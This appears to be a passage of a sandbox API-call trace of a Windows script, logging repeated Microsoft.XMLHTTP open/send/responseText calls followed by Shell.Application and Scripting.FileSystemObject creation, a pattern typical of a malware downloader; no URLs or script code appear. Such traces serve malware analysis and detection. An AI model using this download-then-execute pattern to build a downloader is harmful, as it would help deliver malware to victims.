	[0705.612] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0705.612] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0705.613] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0705.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0705.613] ??2@YAPEAX_K@Z () returned 0x62f330
	[0705.613] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0705.613] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0705.613] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0705.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0705.613] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0705.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.613] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0705.613] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0705.613] longjmp () 
	[0705.614] longjmp () 
	[0705.614] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0705.614] SysStringLen (param_1=0x0) returned 0x0
	[0705.614] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0705.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0705.614] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0705.614] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0705.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0705.614] ??2@YAPEAX_K@Z () returned 0x62f310
	[0705.614] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0705.614] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0705.614] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0705.614] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0705.614] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0705.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.615] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0705.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0705.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0705.615] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0705.615] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0706.014] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0706.014] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0706.014] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0706.014] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0706.015] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0706.015] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0706.015] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0706.015] SysStringLen (param_1=0x0) returned 0x0
	[0706.015] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0706.015] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0706.015] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0706.015] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0706.015] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0706.015] ??2@YAPEAX_K@Z () returned 0x62f350
	[0706.016] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0706.016] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0706.016] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0706.016] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0706.016] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0706.016] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0706.016] SysStringLen (param_1=0x0) returned 0x0
	[0706.016] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0706.019] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0706.019] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0706.019] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0706.019] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0706.019] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0706.019] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0708.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0708.621] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0708.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0708.622] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0708.622] SysStringLen (param_1=0x0) returned 0x0
	[0708.622] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0708.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0708.622] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0708.623] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0708.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0708.623] ??2@YAPEAX_K@Z () returned 0x62f310
	[0708.623] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0708.623] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0708.623] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0708.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0708.623] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0708.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.623] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0708.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0708.626] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0708.626] SysStringLen (param_1=0x0) returned 0x0
	[0708.626] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0708.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0708.626] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0708.626] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0708.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0708.626] ??2@YAPEAX_K@Z () returned 0x62f330
	[0708.626] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0708.626] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0708.626] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0708.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0708.626] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0708.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0708.627] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0708.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0708.627] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0708.627] SysStringLen (param_1=0x0) returned 0x0
	[0708.627] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
